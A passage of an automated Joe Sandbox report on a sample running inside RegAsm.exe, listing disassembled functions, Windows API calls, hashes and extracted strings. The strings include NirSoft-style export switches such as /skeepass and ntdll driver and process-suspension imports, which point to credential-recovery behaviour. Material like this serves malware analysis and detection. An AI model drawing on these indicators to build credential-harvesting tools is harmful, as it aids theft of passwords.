                                                                                                                                                                                                                      • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                                                                                                                                      • free.MSVCRT ref: 00418716
                                                                                                                                                                                                                      • free.MSVCRT ref: 0041872A
                                                                                                                                                                                                                      • free.MSVCRT ref: 00418749
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: free$FullNamePath$malloc$Version
                                                                                                                                                                                                                      • String ID: |A
                                                                                                                                                                                                                      • API String ID: 3356672799-1717621600
                                                                                                                                                                                                                      • Opcode ID: 539f2c4f40ac40545d02d8778def220405c4216a3daad879b42070153127b3fe
                                                                                                                                                                                                                      • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 539f2c4f40ac40545d02d8778def220405c4216a3daad879b42070153127b3fe
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                                                                                                                                                      Function 004125F8 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _wcsicmp
                                                                                                                                                                                                                      • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                                                                                      • API String ID: 2081463915-1959339147
                                                                                                                                                                                                                      • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                                                                                                                      • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                                                                                                                                                      Function 00412172 Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 004121FF
                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                                                                                                                                      • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                                                                                                                                      • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                                                                                                                        • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                                                                                                                        • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                                                                                                                        • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                                                                                                                                      • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1700100422-0
                                                                                                                                                                                                                      • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                                                                                      • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                                                                                                                                      Function 004111C1 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                                                                                                                                      • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                                                                                                                                      • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                                                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                                                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                                                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                                                                                                                                      • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                                                                                                                                      • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 552707033-0
                                                                                                                                                                                                                      • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                                                                      • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                                                                                                                                      Function 00414621 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$_snwprintf
                                                                                                                                                                                                                      • String ID: %%0.%df
                                                                                                                                                                                                                      • API String ID: 3473751417-763548558
                                                                                                                                                                                                                      • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                                                                                                      • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                                                                                                                                                      Function 004060A4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                                                                                                                                      • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                                                                                                                                      • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 00406136
                                                                                                                                                                                                                      • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                                                                                                                                      • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                                                                                                                                      • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                                                                                                                                      • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                                                                                                                      • String ID: A
                                                                                                                                                                                                                      • API String ID: 2892645895-3554254475
                                                                                                                                                                                                                      • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                                                                                      • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                                                                                                                                      Function 0040D957 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                                                                                                                                                        • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                                                                                                                                        • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                                                                                                                                        • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                                                                                                                                        • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                                                                                                                                                      • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                                                                                                                                                      • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                                                                                                                                                      • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040DA23
                                                                                                                                                                                                                      • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                                                                                                                                                      • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                                                                                                                                                      • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                                                                                                                                                        • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                                                                                                                      • String ID: caption
                                                                                                                                                                                                                      • API String ID: 973020956-4135340389
                                                                                                                                                                                                                      • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                                                                                                                                      • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                                                                                                                                                      Function 00410A60 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                                                                                                                                                      • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                                                                                                                                                      • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                                                                                                                                                      • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$_snwprintf$wcscpy
                                                                                                                                                                                                                      • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                                                                      • API String ID: 1283228442-2366825230
                                                                                                                                                                                                                      • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                                                                                                                                      • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                                                                                                                                                      Function 00413959 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 00413972
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                                                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                                                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                                                                        • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 004139D1
                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 004139DC
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004139B8
                                                                                                                                                                                                                        • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                                                                                                                                        • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00413A00
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 00413A27
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                                                                                                                      • String ID: \systemroot
                                                                                                                                                                                                                      • API String ID: 4173585201-1821301763
                                                                                                                                                                                                                      • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                                                                                                                                      • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                                                                                                                                                      Function 0041352F Relevance: 17.5, APIs: 1, Strings: 9, Instructions: 41COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: HandleModule
                                                                                                                                                                                                                      • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                                                                                                                      • API String ID: 4139908857-2887671607
                                                                                                                                                                                                                      • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                                                                                      • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                                                                                                                                      Function 00414BB0 Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: wcscpy
                                                                                                                                                                                                                      • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                                                                                      • API String ID: 1284135714-318151290
                                                                                                                                                                                                                      • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                                                                                                                                                      • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                                                                                                                                                                      Function 0040C084 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 110stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                                                                                                                                        • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                                                                        • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                                                                                                                                                      • strchr.MSVCRT ref: 0040C140
                                                                                                                                                                                                                      • strchr.MSVCRT ref: 0040C151
                                                                                                                                                                                                                      • _strlwr.MSVCRT ref: 0040C15F
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040C17A
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
                                                                                                                                                                                                                      • String ID: 4$h
                                                                                                                                                                                                                      • API String ID: 4019544885-1856150674
                                                                                                                                                                                                                      • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                                                                                                      • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                                                                                                                                      Function 0040D2AB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                                                                                                                      • String ID: 0$6
                                                                                                                                                                                                                      • API String ID: 4066108131-3849865405
                                                                                                                                                                                                                      • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                                                                                                      • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                                                                                                                                      Function 004082C7 Relevance: 15.2, APIs: 10, Instructions: 229COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004082EF
                                                                                                                                                                                                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408362
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408377
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$ByteCharMultiWide
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 290601579-0
                                                                                                                                                                                                                      • Opcode ID: 2c5b7af1b6ad7fa84976a25c4c1a6b62738b238711a472a87ec5ace72f6ab842
                                                                                                                                                                                                                      • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2c5b7af1b6ad7fa84976a25c4c1a6b62738b238711a472a87ec5ace72f6ab842
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                                                                                                                                      Function 00444E84 Relevance: 15.2, APIs: 8, Strings: 2, Instructions: 183COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memchr.MSVCRT ref: 00444EBF
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                                                                                                                                                                      • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044505E
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$memchrmemset
                                                                                                                                                                                                                      • String ID: PD$PD
                                                                                                                                                                                                                      • API String ID: 1581201632-2312785699
                                                                                                                                                                                                                      • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                                                                                                                                                      • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
